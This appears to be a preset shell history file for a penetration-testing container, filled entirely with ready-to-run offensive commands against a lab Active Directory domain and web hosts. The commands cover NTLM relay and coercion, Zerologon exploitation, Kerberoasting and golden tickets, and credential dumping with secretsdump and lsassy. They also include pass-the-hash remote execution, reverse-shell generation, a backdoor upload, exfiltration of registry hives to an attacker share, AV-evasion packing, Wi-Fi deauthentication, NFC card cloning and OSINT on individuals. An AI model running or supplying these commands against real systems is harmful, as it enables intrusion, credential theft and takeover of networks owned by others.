responder --interface eth0 --analyze --disable-ess
responder --interface eth0 --wpad --lm --disable-ess
responder-http-off
responder-http-on
responder-smb-off
responder-smb-on
bloodhound.py --zip -c All -d breaking.bad -u anonymous -p anonymous -dc DC01.BREAKING.BAD
bloodhound.py --zip -c All -d breaking.bad -u anonymous --hashes 'ffffffffffffffffffffffffffffffff':'a88baa3fdc8f581ee0fb05d7054d43e4' -dc DC01.BREAKING.BAD
nslookup _ldap._tcp.dc._msdcs.BREAKING.BAD
nslookup -type=srv _kerberos._tcp.BREAKING.BAD
nslookup -type=srv _gc._tcp.BREAKING.BAD
nslookup -type=srv _kpasswd._tcp.BREAKING.BAD
nslookup -type=srv _ldap._tcp.BREAKING.BAD
nslookup -type=srv _ldap._tcp.dc._msdcs.BREAKING.BAD
nbtscan -r 192.168.56.0/24
nmap --script dns-srv-enum --script-args dns-srv-enum.domain=BREAKING.BAD
mount -o domain='BREAKING.BAD' -o username='someuser' -o password='somepassword' -t cifs '//DC01.BREAKING.BAD/SYSVOL' /tmp/mnttarget/
rpcdump.py DC01.BREAKING.BAD | grep -A 6 MS-RPRN
rpcdump.py DC02.BREAKING.BAD | grep -A 6 MS-RPRN
dementor.py -d breaking.bad -u anonymous -p anonymous 192.168.56.1 DC02.BREAKING.BAD
printerbug.py "breaking.bad"/"anonymous":"anonymous"@"DC02.BREAKING.BAD" 192.168.56.1
ntlmrelayx -t ldaps://DC01.BREAKING.BAD -smb2support --add-computer SHUTDOWN --delegate-access
ntlmrelayx -t ldaps://DC01.BREAKING.BAD -smb2support --remove-mic --add-computer SHUTDOWN --delegate-access
ntlmrelayx -t ldaps://DC01.BREAKING.BAD -smb2support --remove-mic --add-computer SHUTDOWN 123soleil --delegate-access
ntlmrelayx -t ldap://DC01.BREAKING.BAD -smb2support --escalate-user SHUTDOWN
curl --ntlm -u "someuser":"somepassword" 127.0.0.1
getST.py -spn host/SV01.BREAKING.BAD -impersonate Administrator -dc-ip 192.168.56.101 BREAKING.BAD/'SHUTDOWN$':123soleil
getST.py -force-forwardable -spn host/SV01.BREAKING.BAD -impersonate Administrator -dc-ip 192.168.56.101 -hashes :01234567890sv01nthash01234567890 BREAKING.BAD/SV01
secretsdump -k -outputfile BREAKING.BAD DC02.BREAKING.BAD
secretsdump -outputfile BREAKING.BAD -just-dc -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 BREAKING.BAD/Administrator@dc01.breaking.bad
secretsdump -just-dc -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 BREAKING.BAD/Administrator@dc01.breaking.bad
rpcclient -U '' -N DC01.BREAKING.BAD
rpcclient -U BREAKING/anonymous 192.168.56.101
pth-net rpc group members 'Domain admins' -U 'BREAKING.BAD'/'Administrator'%'ffffffffffffffffffffffffffffffff':'a88baa3fdc8f581ee0fb05d7054d43e4' -S 'DC01.BREAKING.BAD'
pth-net rpc group addmem 'Domain admins' 'Shutdown' -U 'BREAKING.BAD'/'Administrator'%'ffffffffffffffffffffffffffffffff':'a88baa3fdc8f581ee0fb05d7054d43e4' -S 'DC01.BREAKING.BAD'
cme smb 192.168.56.0/24 --gen-relay-list smb_targets.txt
mitm6 --interface eth0
mitm6 --interface eth0 --domain BREAKING.BAD
responder --interface eth0 --wpad --lm --ProxyAuth --disable-ess
ntlmrelayx -tf targets.txt -w -6 -smb2support -socks
proxychains secretsdump -no-pass BREAKING/Administrator@SV01.BREAKING.BAD
proxychains smbexec.py -no-pass BREAKING/Administrator@SV01.BREAKING.BAD
proxychains psexec.py -no-pass BREAKING/Administrator@SV01.BREAKING.BAD
proxychains atexec.py -no-pass BREAKING/Administrator@SV01.BREAKING.BAD
proxychains wmiexec.py -no-pass BREAKING/Administrator@SV01.BREAKING.BAD
proxychains dcomexec.py -no-pass BREAKING/Administrator@SV01.BREAKING.BAD
proxychains lsassy -d BREAKING.BAD -u Administrator -p 'p@ssword' -K lsass_loot -o lsass_creds.txt SV01.BREAKING.BAD
psexec.py -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 BREAKING.BAD/Administrator@SV01.BREAKING.BAD
smbexec.py -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 BREAKING.BAD/Administrator@SV01.BREAKING.BAD
wmiexec.py -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 BREAKING.BAD/Administrator@SV01.BREAKING.BAD
wmiexec.py -codec cp850 -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 BREAKING.BAD/Administrator@SV01.BREAKING.BAD
atexec.py -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 BREAKING.BAD/Administrator@SV01.BREAKING.BAD
dcomexec.py -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 BREAKING.BAD/Administrator@SV01.BREAKING.BAD
dcomexec.py -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 BREAKING.BAD/Administrator@SV01.BREAKING.BAD
cme smb 192.168.56.101 --local-auth -u Administrator -H a88baa3fdc8f581ee0fb05d7054d43e4 -M enum_avproducts
cme smb 192.168.56.101 --local-auth -u Administrator -H a88baa3fdc8f581ee0fb05d7054d43e4 -M mimikatz
cme smb 192.168.56.0/24 --local-auth -u Administrator -H a88baa3fdc8f581ee0fb05d7054d43e4 -M lsassy
cme smb 192.168.56.0/24 --local-auth -u Administrator -H a88baa3fdc8f581ee0fb05d7054d43e4 -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=exegol4thewin
sprayhound -d 'BREAKING.BAD' -dc 'DC01.BREAKING.BAD' -nu 'neo4j' -np 'exegol4thewin' -lu 'anonymous' -lp 'anonymous' -p 'azerty'
sprayhound -d 'BREAKING.BAD' -dc 'DC01.BREAKING.BAD' -nu 'neo4j' -np 'exegol4thewin' -lu 'anonymous' -lp 'anonymous'
lsassy -v -u 'Administrator' -H a88baa3fdc8f581ee0fb05d7054d43e4 -K lsass_loot -o lsass_creds.txt 192.168.56.0/24
lsassy -v -d 'BREAKING.BAD' -u 'Administrator' -p 'passw0rd' -K lsass_loot -o lsass_creds.txt 192.168.56.0/24
export KRB5CCNAME=Administrator.ccache
lsassy -k -d BREAKING.BAD -u Administrator -K lsass_loot -o lsass_creds.txt SV01.BREAKING.BAD
masscan -v -p 1-65535 --rate=10000 -e eth0 192.168.56.0/24
masscan -v -p 1-65535,U:1-65535 --rate=10000 -e eth0 192.168.56.0/24
gobuster dir -w `fzf-wordlists` -u http://192.168.56.0:8000/
kr scan hosts.txt -A=apiroutes-210328:20000 -x 5 -j 100 --fail-status-codes 400,401,404,403,501,502,426,411
kr scan target.com -w routes.kite -A=apiroutes-210328:20000 -x 20 -j 1 --fail-status-codes 400,401,404,403,501,502,426,411
kr brute https://target.com/subapp/ -A=aspx-210328:20000 -x 20 -j 1
kr brute https://target.com/subapp/ -w dirsearch.txt -x 20 -j 1 -exml,asp,aspx,ashx -D
kr scan https://target.com:8443/ -w  /opt/tools/kiterunner/routes-large.kite -A=apiroutes-210228:20000 -x 10 --ignore-length=34
kr scan target.com -w /opt/tools/kiterunner/routes-large.kite -A=apiroutes-210228:20000 -x 10 --ignore-length=34
kr scan targets.txt -w /opt/tools/kiterunner/routes-small.kite -A=apiroutes-210228:20000 -x 10 --ignore-length=34
cme smb 192.168.56.0/24 -u anonymous -p anonymous --shares
cme smb 192.168.56.0/24 -u '' -p '' --shares
cme smb 192.168.56.0/24 -u anonymous -p anonymous --sessions
cme smb 192.168.56.0/24 -u anonymous -p anonymous --loggedon-users
cme smb 192.168.56.0/24 --local-auth -u '' -p ''
privexchange.py -ah 192.168.56.1 -d BREAKING.BAD -u anonymous -p anonymous EXCHANGE.BREAKING.BAD
neo4j start
lnk-generate.py --host 192.168.56.1 --type ntlm --output '@SHUTDOWN-LNK.lnk'
autorecon 192.168.10.10
nmap --script=ldap-search -p 389 192.168.10.10
nmap -p 5900 --script=realvnc-auth-bypass 192.168.10.10
dirb http://192.168.10.10 /usr/share/seclists/Discovery/Web-Content/big.txt
gobuster dir -w `fzf-wordlists` -t 20 -x php,txt,pl,sh,asp,aspx,html,json,py,cfm,rb,cgi,bak,tar.gz,tgz,zip -u http://192.168.10.10/
smtp-user-enum -M RCPT -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t 192.168.10.10
smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t 192.168.10.10
smtp-user-enum -M EXPN -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t 192.168.10.10
onesixtyone 192.168.10.10 private
onesixtyone 192.168.10.10 public
onesixtyone 192.168.10.10 manager
onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt 192.168.10.10
snmpwalk -c public -v 1 192.168.10.10
snmpwalk -c public -v 2c 192.168.10.10
cewl --depth 10 --with-numbers --write cewl.txt 192.168.10.10
wpscan --api-token APITOKEN --url http://192.168.10.10/ --no-banner --plugins-version-detection passive --password-attack xmlrpc -U 'admin' -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt
wpscan --api-token APITOKEN --url http://192.168.10.10/ --no-banner --plugins-detection aggressive
wpscan --api-token APITOKEN --url http://192.168.10.10/ --no-banner --enumerate u1-20
nmblookup -A 192.168.10.10
nmap --script 'smb-enum*' --script-args unsafe=1 -T5 192.168.10.10
smbmap -H 192.168.10.10
smbmap -u guest -H 192.168.10.10
smbmap -H 192.168.10.10 -R
smbmap -H 192.168.10.10 -R test
smbclient --list 192.168.10.10
smbclient --no-pass --user '' //192.168.10.10/SYSVOL
smbclient --no-pass --user '' --list 192.168.10.10
smbclient.py BREAKING.BAD/user:astrongpassword@192.168.56.201
nmap --script smb-enum-shares -p 139,445 -T4 -Pn 192.168.10.10
amap -d 192.168.10.10 4455
nikto -host 192.168.10.10
dotdotpwn -m payload -h 192.168.10.10 -x 80 -p request.req -k 'root:' -f /etc/passwd
dotdotpwn -m stdout -d 5 -f /etc/passwd
kadimus -u 'http://192.168.10.10/?page=file1.php'
kadimus --cookie 'PHPSESSID=qsh5s21mo54qds7v5384f1q34' -u 'http://192.168.10.10/?page=file1.php'
shellerator --reverse-shell --ip 192.168.56.1 --port 1337 --type powershell
shellerator
rlwrap nc -lvnp 1337
GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -dc-ip 192.168.56.101 BREAKING.BAD/
GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -dc-ip 192.168.56.101 BREAKING.BAD/anonymous:anonymous
GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -usersfile users.txt -dc-ip 192.168.56.101 BREAKING.BAD/
GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 -dc-ip 192.168.56.101 BREAKING.BAD/Administrator
hashcat --status --hash-type 18200 --attack-mode 0 ASREProastables.txt `fzf-wordlists`
john --wordlist=`fzf-wordlists` ASREProastables.txt
GetUserSPNs.py -outputfile Kerberoastables.txt -dc-ip 192.168.56.101 BREAKING.BAD/anonymous:anonymous
GetUserSPNs.py -outputfile Kerberoastables.txt -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 -dc-ip 192.168.56.101 BREAKING.BAD/Administrator
hashcat --status --hash-type 13100 --attack-mode 0 Kerberoastables.txt `fzf-wordlists`
john --format=krb5tgs --wordlist=`fzf-wordlists` Kerberoastables.txt
polenum -u anonymous -p anonymous -d DC01.BREAKING.BAD
cme smb 192.168.56.101 -u '' -p '' --pass-pol
addcomputer.py -computer-name 'SHUTDOWN$' -computer-pass '123soleil!' -dc-host DC01 -domain-netbios BREAKING.BAD 'BREAKING.BAD/anonymous:anonymous'
smbexec.py -share 'ADMIN$' -k SV01.BREAKING.BAD
wmiexec.py -k SV01.BREAKING.BAD
getST.py -spn CIFS/SV01@BREAKING.BAD -impersonate Administrator -dc-ip 192.168.56.101 'BREAKING.BAD/SHUTDOWN$:123soleil'
getST.py -spn RPCSS/SV01.BREAKING.BAD -impersonate Administrator -dc-ip 192.168.56.101 'BREAKING.BAD/SHUTDOWN$:123soleil'
secretsdump -just-dc-user krbtgt -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 'BREAKING.BAD/Administrator@dc01.breaking.bad'
lookupsid.py -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 'BREAKING.BAD/Administrator@dc01.breaking.bad' 0
ticketer.py -nthash c1c635aa12ae60b7fe39e28456a7bac6 -domain-sid S-1-5-11-39129514-1145628974-103568174 -domain BREAKING.BAD randomuser
ticketer.py -nthash c1c635aa12ae60b7fe39e28456a7bac6 -spn HOST/SV01.BREAKING.BAD -domain-sid S-1-5-11-39129514-1145628974-103568174 -domain BREAKING.BAD randomuser
export KRB5CCNAME=randomuser.ccache
secretsdump -k SV01.BREAKING.BAD
hashcat --status --hash-type 1000 --attack-mode 0 --username BREAKING.BAD.ntds `fzf-wordlists`
hashcat --hash-type 1000 --potfile-path BREAKING.BAD.ntds.cracked BREAKING.BAD.ntds --show --username
cme ldap 192.168.56.101 -d BREAKING.BAD -u anonymous -p anonymous --asreproast ASREProastables.txt --kdcHost 192.168.56.101
cme ldap 192.168.56.101 -d BREAKING.BAD -u anonymous -p anonymous --kerberoasting Kerberoastables.txt --kdcHost 192.168.56.101
ldapsearch -x -h 192.168.56.101 -D '' -w '' -b "dc=BREAKING,dc=BAD"
addspn.py -u 'BREAKING\SV01$' -p aad3b435b51404eeaad3b435b51404ee:c1c635aa12ae60b7fe39e28456a7bac6 -s HOST/SHUTDOWN.BREAKING.BAD --additional DC01.BREAKING.BAD
dnstool.py -u 'BREAKING\SV01$' -p aad3b435b51404eeaad3b435b51404ee:c1c635aa12ae60b7fe39e28456a7bac6 -r SHUTDOWN.BREAKING.BAD -d 192.168.56.1 --action add DC01.BREAKING.BAD
krbrelayx.py -aesKey 9ff86898afa70f5f7b9f2bf16320cb38edb2639409e1bc441ac417fac1fed5ab
addspn.py -u 'BREAKING\serviceaccount' -p P4ssw0rd -t SV01 -s HTTP/SHUTDOWN.BREAKING.BAD --additional DC01.BREAKING.BAD
dnstool.py -u 'BREAKING\serviceaccount' -p P4ssw0rd -r SHUTDOWN.BREAKING.BAD -d 192.168.56.1 --action add DC01.BREAKING.BAD
dnstool.py -u 'BREAKING\serviceaccount' -p P4ssw0rd -r SHUTDOWN.BREAKING.BAD -d 192.168.56.1 --action query DC01.BREAKING.BAD
privexchange.py -u serviceaccount -p P4ssw0rd -ah SHUTDOWN.BREAKING.BAD EXCHANGE.BREAKING.BAD -d BREAKING.BAD
krbrelayx.py --krbpass P4ssw0rd --krbsalt BREAKING.BADSV01 -t ldap://dc01.breaking.bad --escalate-user serviceaccount
wfuzz -c --hw 157 -L -w `fzf-wordlists` -w `fzf-wordlists` -X POST -d 'username=FUZZ&password=FUZ2Z' -u http://192.168.10.10/admin
wfuzz --hc 401 -c -v -w /usr/share/seclists/Usernames/top-usernames-shortlist.txt -w /usr/share/seclists/Passwords/darkweb2017-top100.txt --basic FUZZ:FUZ2Z -u http://192.168.10.10/secretpage
pypykatz lsa minidump lsass.dmp
enyx 1 public 192.168.10.10
wfuzz --hc 403,404 -c -w /usr/share/seclists/Discovery/Web-Content/big.txt -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt -u http://192.168.10.10/FUZZFUZ2Z
fcrackzip -u -v -D -p /usr/share/wordlists/rockyou.txt file.zip
ffuf -fs 185 -c -w `fzf-wordlists` -H 'Host: FUZZ.machine.org' -u http://192.168.10.10/
ffuf -fs 185 -c -w `fzf-wordlists` -H 'Host: FUZZ.org' -u http://192.168.10.10/
ffuf -c -w `fzf-wordlists` -e .php,.txt,.pl,.sh,.asp,.aspx,.html,.json,.py,.cfm,.rb,.cgi,.bak,.tar.gz,.tgz,.zip -u http://192.168.10.10/FUZZ
ffuf -c -w `fzf-wordlists` -u http://192.168.10.10/FUZZ --extract-links
ffuf -c -w `fzf-wordlists` -u http://192.168.10.10/FUZZ
wfuzz --hh 185 -c -w `fzf-wordlists` -H "Host: FUZZ.machine.org" -u http://192.168.10.10/
wfuzz --hh 185 -c -w `fzf-wordlists` -H "Host: FUZZ.org" -u http://192.168.10.10/
evil-winrm -u serviceaccount -p P4ssw0rd -i 192.168.56.101
evil-winrm -u serviceaccount -H c1c635aa12ae60b7fe39e28456a7bac6 -i 192.168.56.101
cme smb 192.168.56.101 --continue-on-success -u users.txt -p passwords.txt
cme smb 192.168.56.101 --continue-on-success --no-bruteforce -u users.txt -p passwords.txt
smbpasswd -U BREAKING/serviceaccount -r 192.168.56.101
enum4linux-ng -A -u BREAKING/serviceaccount -p 'P@ssword' 192.168.56.101
enum4linux-ng -A 192.168.59.101
enum4linux-ng -L 192.168.59.101
nmap -sS -p 3268,3269 192.168.56.0/24
nmap -sC -sV -p 139,445,80,21 192.168.56.201
nmap -Pn -v -sS -F 192.168.56.0/24
curl http://192.168.10.10/ --upload-file backdoor.php -v
net rpc password 'someuser' 'somepassword' -U 'BREAKING.BAD'/'anotheruser'%'P@ssword' -S 'DC01.BREAKING.BAD'
net rpc user add 'someuser' 'somepassword' -U 'BREAKING.BAD'/'anotheruser'%'P@ssword' -S 'DC01.BREAKING.BAD'
pth-net rpc password 'someuser' 'somepassword' -U 'BREAKING.BAD'/'anotheruser'%'ffffffffffffffffffffffffffffffff':'c1c635aa12ae60b7fe39e28456a7bac6' -S 'DC01.BREAKING.BAD'
zerologon-scan DC01 192.168.56.101
zerologon-exploit DC01 192.168.56.101
secretsdump -no-pass 'BREAKING.BAD'/'DC01$'@'dc01.breaking.bad'
secretsdump -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 BREAKING.BAD/Administrator@dc01.breaking.bad
secretsdump -ldapfilter '(&(objectCategory=person)(objectClass=user)(!userAccountControl:1.2.840.113556.1.4.803:=2))' -just-dc -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 BREAKING.BAD/Administrator@dc01.breaking.bad
secretsdump -ldapfilter '(&(objectClass=user)(adminCount=1))' -just-dc -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 BREAKING.BAD/Administrator@dc01.breaking.bad
zerologon-restore breaking/dc01@dc01 -target-ip 192.168.56.101 -hexpass 69762...6945d
pm3 -p /dev/ttyACM0
proxmark3 -p /dev/ttyACM0
nmap --script http-ntlm-info --script-args http-ntlm-info.root=/ews/ -p 443 mx.example.com
ruler -k -d example.com -u j.doe -p 'Passw0rd!' -e j.doe@example.com --verbose abk dump -o emails.txt
ruler -k -d example.com brute --users owa-valid-users.txt --passwords passwords.txt --delay 35 --attempts 3 --verbose | tee -a spray-results.txt
oaburl.py MEGACORP/j.doe:'Passw0rd!'@mx.example.com -e existent.email@example.com
cypheroth -u neo4j -p exegol4thewin -d BREAKING.BAD
nmap -sS -n --open -p 88 192.168.56.0/24
windapsearch --dc 192.168.56.101 --module metadata
windapsearch --dc 192.168.56.101 --module users
nmap --script broadcast-dhcp-discover
SimplyEmail -all -e cybersyndicates.com
ssh-keygen -t rsa -b 4096 -f keyname
hashcat --username --hash-type 0 --attack-mode 0 MD5_hashes.txt `fzf-wordlists`
rbcd.py t-delegate-to 'sv01$' -dc-ip dc01 -action read 'BREAKING/anonymous:anonymous'
rbcd.py -delegate-from 'shutdown' -delegate-to 'sv01$' -dc-ip dc01 -action write 'BREAKING/anonymous:anonymous'
rbcd.py -delegate-from 'shutdown' -delegate-to 'sv01$' -dc-ip dc01 -action remove 'BREAKING/anonymous:anonymous'
xfreerdp /d:BREAKING.BAD /u:someuser /pth:c1c635aa12ae60b7fe39e28456a7bac6 /v:SV01.BREAKING.BAD /cert-ignore
darkarmour -f /data/beacon.exe --encrypt xor --jmp --loop 7 -o /data/legit.exe
amber -f beacon.exe
hcxdumptool -I
hcxdumptool -i wlan1 -o dump.pcapng --active_beacon --enable_status=1
hcxpcapngtool -o dump.hashcat dump.pcapng
hcxhashtool -i dump.hashcat --info stdout
hashcat --hash-type 16800 --attack-mode 0 dump_WPA-PMKID-PBKDF2.hashcat `fzf-wordlists`
hcxpcapngtool --all -o dump.hashcat dump.pcapng
hashcat --hash-type 22000 --attack-mode 0 dump_WPA-PBKDF2-PMKID_EAPOL.hashcat `fzf-wordlists`
responder --interface eth0 --analyze --lm --disable-ess
ntlmv1-multi --ntlmv1 SV01$::BREAKING.BAD:AD1235DEAC142CD5FC2D123ADCF51A111ADF45C2345ADCF5:AD1235DEAC142CD5FC2D123ADCF51A111ADF45C2345ADCF5:1122334455667788
airmon-ng start wlan1
airodump-ng wlan1
airodump-ng -c 1 wlan1
aireplay-ng --deauth 10 -a TR:GT:AP:BS:SS:ID wlan1
sublist3r -v -d example.com
subjack -w subdomains.txt -t 100 -timeout 30 -o results.txt -ssl
holehe test@gmail.com
theHarvester.py -d example.com -g -s -r -f example.com.xml -b all
infoga.py -d example.com -s all -b -r example.com.txt -v 2
h8mail -t test@gmail.com
phoneinfoga scan -n 33123456789
maigret user
linkedin2username.py -u myname@email.com -c uber-com
toutatis.py -s SESSIONID -u starbucks
twint -u username --since "2015-12-20 20:30:15"
twint -g="48.880048,2.385939,1km" -o file.csv --csv
ipinfo 1.1.1.1
onionsearch "computer"
onionsearch "computer" --engines tor66 deeplink phobos --limit 3
waybackurls test.com
carbon14.py http://menfous.com/
github-email ghusername
WikiLeaker google.com
tiktok-scraper user USERNAME -d -n 100
buster -e 'j********9@g****.com' -f john -l doe -b '****1989'
cloudfail.py --target seo.com --tor
assetfinder google.com
subfinder -d freelancer.com
theHarvester -d github.com -b all
nfc-scan-device -v
nfc-list
mfoc -O original.dmp
mfoc -O magic-gen1.dmp
mfdread original.dmp
nfc-mfclassic W A B original.dmp magic-gen1.dmp
libnfc_crypto1_crack a0a1a2a3a4a5 0 A 4 B
mfoc -O original.dmp -k keys.txt
nrf24-scanner.py -l -v
jackit --reset --debug
secretsdump -ntds ntds.dit.save -system system.save LOCAL
gosecretsdump -ntds ntds.dit.save -system system.save
screen /dev/ttyACM0 115200
httpmethods --threads 40 --location http://www.s01.breaking.bad/
hakrawler -url http://www.s01.breaking.bad/
adidnsdump -u "BREAKING.BAD\someuser" -p 'somepassword' --print-zones 192.168.56.101
proxychains adidnsdump --dns-tcp -u "BREAKING.BAD\someuser" -p 'somepassword' --print-zones 192.168.56.101
ngrok authtoken AUTHTOKEN:::https://dashboard.ngrok.com/get-started/your-authtoken
feroxbuster -w `fzf-wordlists` -u http://192.168.10.10/
bloodhound-import -du neo4j -dp exegol4thewin *.json
bloodhound-quickwin -u neo4j -p exegol4thewin
ldapsearch-ad --server 'dc01.breaking.bad' --domain 'breaking.bad' --username 'someuser' --password 'somepassword' --type all
ldapsearch-ad --server 'dc01.breaking.bad' --type info
dnstool.py -u 'BREAKING.BAD\johndoe' -p 'somepassword' --record '*' --action query DC01.BREAKING.BAD
dnstool.py -u 'BREAKING.BAD\johndoe' -p 'somepassword' --record '*' --action add --data 192.168.56.1 DC01.BREAKING.BAD
ntlm-scanner -vuln CVE-2019-1019 -target 'BREAKING.BAD'/'someuser':'somepassword'@'DC01.BREAKING.BAD'
ntlm-scanner -vuln CVE-2019-1338 -target 'BREAKING.BAD'/'someuser':'somepassword'@'DC01.BREAKING.BAD'
ntlm-scanner -vuln CVE-2019-1166 -target 'BREAKING.BAD'/'someuser':'somepassword'@'DC01.BREAKING.BAD'
ntlm-scanner -vuln CVE-2019-1040 -target 'BREAKING.BAD'/'someuser':'somepassword'@'DC01.BREAKING.BAD'
das add -db dbname masscan '-e eth0 --rate 1000 -iL hosts.txt --open -p1-65535'
das add -db dbname rustscan '-b 1000 -t 2000 -u 5000 -a hosts.txt -r 1-65535 -g --no-config --scan-order "Random"'
das scan -db dbname -hosts all -oA report1 -nmap '-Pn -sVC -O' -parallel
das scan -db dbname -ports 22,80,443,445 -show
das report -hosts 192.168.1.0/24 -oA report2
hashcat --status --hash-type 2100 --attack-mode 0 '$DCC2$10240#user#bb38628253e7681553b72e7da3adf305' `fzf-wordlists`
pypykatz kerberos tgt "kerberos+rc4://BREAKING.BAD\someuser:bb38628253e7681553b72e7da3adf305@domain.local"
ms14-068.py -u someuser@breaking.bad --rc4 0123456789krbtgtnthash0123456789 -s S-1-5-11-39129514-1145628974-103568174 -d dc01.breaking.bad
getST.py -k -no-pass -spn host/dc01.breaking.bad breaking.bad/someuser
ldapdomaindump --user 'breaking.bad\someuser' --password 'somepassword' --outdir ldapdomaindump dc01.breaking.bad
Get-GPPPassword -debug -no-pass dc01.breaking.bad
Get-GPPPassword BREAKING.BAD/someuser:somepassword@DC01.BREAKING.BAD
cme smb --list-modules
cme ldap dc01.breaking.bad -d breaking.bad -u someuser -p somepassword -M maq
ntlmrelayx -t dcsync://dc02.breaking.bad -smb2support
whatportis 3306
whatportis postgresql
cmsmap -F -d http://192.168.10.10/
clusterd -i http://192.168.10.10/
dirsearch -r -w /usr/share/wordlists/seclists/Discovery/Web-Content/quickhits.txt -u http://192.168.10.10/
moodlescan -r -u http://192.168.10.10/
pywhisker.py -v -d 'domain.local' -u 'user2' -H '126f1f9fdb9a7d9c7ba8d269728b7da0' -t 'sv01$' -a 'add' -o 'sv01'
gettgtpkinit.py -cert-pfx 'sv01.pfx' -pfx-pass 'RLLXdD5FhNPRphSqKGg8' 'domain.local'/'sv01$' 'sv01.ccache'
KRB5CCNAME='sv01.ccache' getnthash.py -key '8eb7a6388780dd52eb358769dc53ff685fd135f89c4ef55abb277d7d98995f72' 'domain.local'/'sv01$'
petitpotam.py 192.168.56.1 dc01.breaking.bad
petitpotam.py -d breaking.bad -u someaccount -p somepassword 192.168.56.1 dc01.breaking.bad
ntlmrelayx -t ldap://dc02.breaking.bad -smb2support --remove-mic --shadow-credentials --shadow-target 'dc01$'
targetedKerberoast.py -v -d domain.local -u user1 -p complexpassword -o Kerberoastables.txt
pass-station search tomcat
nth --text 5f4dcc3b5aa765d61d8327deb882cf99
pywsus.py --host 192.168.56.1 --port 8530 --executable /opt/resources/windows/sysinternals/PsExec64.exe --command '/accepteula /s cmd.exe /c "net localgroup Administrators DOMAIN\controlleduser /add"'
DonPAPI.py breaking.bad/someadmin:somepassword@sometarget
webclientservicescanner -dc-ip dc01.domain.local domain.local/user:password@dc01.domain.local
ntlmrelayx -t http://pki.domain.local/certsrv/certfnsh.asp --adcs
echo '8.8.8.8' | hakrevdns
prips 192.168.0.0 192.168.0.255
prips -i4 192.168.0.10 192.168.0.250
prips 173.0.84.0/24 | hakrevdns
nuclei -u https://example.com
ntpdate -u 192.168.56.101
renameMachine.py -current-name "testcomputer$" -new-name "DC01" -dc-ip dc01 "domain"/"user1":"complexpassword"
getTGT.py -dc-ip dc01 "domain.local"/"DC01":"123pentest"
renameMachine.py -current-name "DC01" -new-name "testcomputer$" -dc-ip dc01 "domain"/"user1":"complexpassword"
KRB5CCNAME="DC01.ccache" getST.py -self -impersonate "domainadmin" -spn "cifs/dc01.domain.local" -k -no-pass -dc-ip dc01 "domain.local"/"dc01"
KRB5CCNAME="domainadmin.ccache" secretsdump -just-dc-user "krbtgt" -dc-ip dc01 -k -no-pass @"dc01.domain.local"
KRB5CCNAME="domainadmin.ccache" secretsdump -just-dc-user "krbtgt" -dc-ip dc01 -k -no-pass @"dc01.domain.local"
pwndb --target @example.com --output txt
robotstester -u http://www.example.com/ -L
shadowcoerce.py -d "domain" -u "user1" -p "complexpassword" 192.168.56.1 192.168.56.101
faketime '2022-01-31 22:05:35' zsh
manspider --threads 50 192.168.56.0/24 -d BREAKING.BAD -u someuser -H bb38628253e7681553b72e7da3adf305 --content administrateur
dcsync.py -dc "dc01.domain.local" -t "CN=someuser,OU=Users,DC=DOMAIN,DC=LOCAL" 'domain\someuser:somepassword'
gMSADumper.py -d "domain.local" -l "dc01.domain.local" -u "someuser" -p "somepassword"
modifyCertTemplate.py -template KerberosAuthentication -get-acl "domain.local"/"someuser":"somepassword"
smbserver.py -smb2support SHUTDOWN .
reg.py 'domain.local/backup_operator:somepassword@192.168.56.101' save -keyName 'HKLM\SAM' -o '\\192.168.56.1\SHUTDOWN'
reg.py 'domain.local/backup_operator:somepassword@192.168.56.101' save -keyName 'HKLM\SYSTEM' -o '\\192.168.56.1\SHUTDOWN'
reg.py 'domain.local/backup_operator:somepassword@192.168.56.101' save -keyName 'HKLM\SECURITY' -o '\\192.168.56.1\SHUTDOWN'
reg.py 'domain.local/backup_operator:somepassword@192.168.56.101' backup -o '\\192.168.56.1\SHUTDOWN'
secretsdump -sam SAM.save -system SYSTEM.save -security SECURITY.save LOCAL
pyLAPS.py --action get -d 'domain.local' -u 'someuser' -p 'somepassword' --dc-ip 192.168.56.101
FindUncommonShares.py -d 'domain.local' -u 'someuser' -p 'somepassword' --dc-ip 192.168.56.101
certipy find -dc-ip 'domaincontroller' -scheme ldap 'domain.local'/'user':'password'@'domaincontroller'
LdapRelayScan.py -method BOTH -dc-ip 192.168.56.101 -u 'someuser' -p 'somepassword'
goldencopy --tools all --password exegol4thewin --stealth --krbtgt 060ee2d06c5648e60a9ed916c9221ad19d90e5fb7b1cccf9d51f540fe991ada1 "john"
crackhound.py --verbose --password "exegol4thewin" --plain-text --plain-text --domain "BREAKING.BAD" --file ownedusers.txt --add-password
# -=-=-=-=-=-=-=- YOUR COMMANDS BELOW -=-=-=-=-=-=-=- #
